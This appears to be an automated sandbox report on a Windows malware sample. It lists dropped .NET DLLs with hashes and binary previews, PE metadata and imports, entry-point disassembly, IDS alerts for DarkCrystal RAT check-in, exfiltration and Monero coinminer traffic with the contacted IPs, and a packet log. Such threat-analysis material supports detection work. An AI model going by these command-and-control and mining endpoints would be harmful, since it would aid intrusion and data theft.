                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):342528
                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):85504
                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):38400
                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46592
                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294912
                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):36352
                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:MSVC .res
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1224
                                                                                                  Entropy (8bit):4.435108676655666
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                  Malicious:false
                                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4608
                                                                                                  Entropy (8bit):3.9957696105830656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:6xJ4aPt8GM7Jt8Bs3FJsdcV4MKe27EqdvjbvqBHiOulajfqXSfbNtm:YPUPc+Vx9MpvkMcjRzNt
                                                                                                  MD5:A05F0BD4BACAAB457826B5B157B990EC
                                                                                                  SHA1:A49E1A09995F02F170A4C4EFE66B6AB802AD29E2
                                                                                                  SHA-256:CF97615D0AE928CD4EC16069B614A8C8451237DCE397E802209B10EDA116BC6F
                                                                                                  SHA-512:7F6A3AAC255A8C1F291DFCB2C1EEF5E7F652797986216055B8A32526C8B010104F820AE0801A1858CABEAA64821FC8437D14F0CAA25EF93E66B5C695CEB00563
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..f.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..p.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.@.......#GUID...P... ...#Blob...........WU........%3................................................................
                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Entropy (8bit):7.999061183663955
                                                                                                  TrID:
                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:VaTlw2kNGc.exe
                                                                                                  File size:22'154'667 bytes
                                                                                                  MD5:21dd41d299117fe5c556afc317f9fcbf
                                                                                                  SHA1:059dc993dace11614e1077fb0eb36c602ff347f1
                                                                                                  SHA256:a4cf3adaa9f44653f7bad93cbaebf994f398ccabf64e968b421266a7882b9a63
                                                                                                  SHA512:2f1704ff9632136812822f31dc484ea2e4921cb475b04575596ac8e9374eef4b006cbc963459c33102f33a44c9550bc16150dabf2a2798f27995b71bd1bb7f9e
                                                                                                  SSDEEP:393216:38zTb8tvKrX7QsFLVQAV/JqolX6vrN/04LaUaWYCVxysGt7G/yF7D:383ZrrXlVFlYrRDLaT4r
                                                                                                  TLSH:5E273325B3B919A6F87798788CD24E4EF49174760744C6DF03B18BF25FE3AF1499A280
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..
                                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                                  Entrypoint:0x14000c0d0
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x140000000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x669E0160 [Mon Jul 22 06:51:12 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:456e8615ad4320c9f54e50319a19df9c
                                                                                                  Instruction
                                                                                                  dec eax
                                                                                                  sub esp, 28h
                                                                                                  call 00007FD65CBAA24Ch
                                                                                                  dec eax
                                                                                                  add esp, 28h
                                                                                                  jmp 00007FD65CBA9E6Fh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  dec eax
                                                                                                  sub esp, 28h
                                                                                                  call 00007FD65CBAA618h
                                                                                                  test eax, eax
                                                                                                  je 00007FD65CBAA013h
                                                                                                  dec eax
                                                                                                  mov eax, dword ptr [00000030h]
                                                                                                  dec eax
                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                  jmp 00007FD65CBA9FF7h
                                                                                                  dec eax
                                                                                                  cmp ecx, eax
                                                                                                  je 00007FD65CBAA006h
                                                                                                  xor eax, eax
                                                                                                  dec eax
                                                                                                  cmpxchg dword ptr [0003843Ch], ecx
                                                                                                  jne 00007FD65CBA9FE0h
                                                                                                  xor al, al
                                                                                                  dec eax
                                                                                                  add esp, 28h
                                                                                                  ret
                                                                                                  mov al, 01h
                                                                                                  jmp 00007FD65CBA9FE9h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  dec eax
                                                                                                  sub esp, 28h
                                                                                                  test ecx, ecx
                                                                                                  jne 00007FD65CBA9FF9h
                                                                                                  mov byte ptr [00038425h], 00000001h
                                                                                                  call 00007FD65CBA9745h
                                                                                                  call 00007FD65CBAAA30h
                                                                                                  test al, al
                                                                                                  jne 00007FD65CBA9FF6h
                                                                                                  xor al, al
                                                                                                  jmp 00007FD65CBAA006h
                                                                                                  call 00007FD65CBB753Fh
                                                                                                  test al, al
                                                                                                  jne 00007FD65CBA9FFBh
                                                                                                  xor ecx, ecx
                                                                                                  call 00007FD65CBAAA40h
                                                                                                  jmp 00007FD65CBA9FDCh
                                                                                                  mov al, 01h
                                                                                                  dec eax
                                                                                                  add esp, 28h
                                                                                                  ret
                                                                                                  int3
                                                                                                  int3
                                                                                                  inc eax
                                                                                                  push ebx
                                                                                                  dec eax
                                                                                                  sub esp, 20h
                                                                                                  cmp byte ptr [000383ECh], 00000000h
                                                                                                  mov ebx, ecx
                                                                                                  jne 00007FD65CBAA059h
                                                                                                  cmp ecx, 01h
                                                                                                  jnbe 00007FD65CBAA05Ch
                                                                                                  call 00007FD65CBAA58Eh
                                                                                                  test eax, eax
                                                                                                  je 00007FD65CBAA01Ah
                                                                                                  test ebx, ebx
                                                                                                  jne 00007FD65CBAA016h
                                                                                                  dec eax
                                                                                                  lea ecx, dword ptr [000383D6h]
                                                                                                  call 00007FD65CBB7332h
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3c76c0x78.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000xeb4.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x2208.pdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000x768.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x39dc00x1c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39c800x140.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x450.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x292100x29400aca64598002ecff9eefbc96554edf015False0.5511067708333334data6.4784482217419175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x2b0000x126420x12800ec8930c34780c48df36a7fb9e2bc5cc7False0.5245328336148649data5.75078934868212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x3e0000x73d80xe00d0a288978c66419b180b35f625b6dce7False0.13532366071428573data1.8378139998458343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .pdata0x460000x22080x240074cf3ea22e0a1756984435d6f80f7da5False0.4671223958333333data5.259201915045256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x490000xeb40x10003eff7c3c169b12e5b0914bdd9a1a8712False0.407958984375data5.340564442422027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x4a0000x7680x80071de9271648326ec88350e903470cf3eFalse0.5576171875data5.283119454571673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x490e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.39305054151624547
                                                                                                  RT_GROUP_ICON0x499900x14data1.15
                                                                                                  RT_MANIFEST0x499a40x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                  DLLImport
                                                                                                  USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                  COMCTL32.dll
                                                                                                  KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                  ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                  GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                  2024-08-02T00:07:34.734705+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)4973880192.168.2.4194.58.42.154
                                                                                                  2024-08-02T00:07:10.415595+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage49740443192.168.2.445.76.89.70
                                                                                                  2024-08-02T00:07:44.902790+0200UDP2036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5570753192.168.2.41.1.1.1
                                                                                                  2024-08-02T00:08:40.967219+0200TCP2048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)4973880192.168.2.4194.58.42.154
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Aug 2, 2024 00:08:02.587472916 CEST4974280192.168.2.4208.95.112.1
                                                                                                  Aug 2, 2024 00:08:02.592530966 CEST8049742208.95.112.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:02.592619896 CEST4974280192.168.2.4208.95.112.1
                                                                                                  Aug 2, 2024 00:08:02.592679024 CEST4974280192.168.2.4208.95.112.1
                                                                                                  Aug 2, 2024 00:08:02.597564936 CEST8049742208.95.112.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:03.163827896 CEST8049742208.95.112.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:03.234669924 CEST4974280192.168.2.4208.95.112.1
                                                                                                  Aug 2, 2024 00:08:03.632692099 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:03.632738113 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:03.632901907 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:03.678659916 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:03.678689957 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.198834896 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.201767921 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.201778889 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.203339100 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.203524113 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.204282045 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.204375029 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.204554081 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.204653025 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.204678059 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.205451012 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.205487967 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.209460974 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.209505081 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213454008 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213484049 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213506937 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213519096 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213583946 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213597059 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213610888 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213628054 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213674068 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213691950 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213694096 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213701010 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213704109 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213711023 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213716030 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213722944 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213751078 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213762999 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213803053 CEST49743443192.168.2.4162.159.138.232
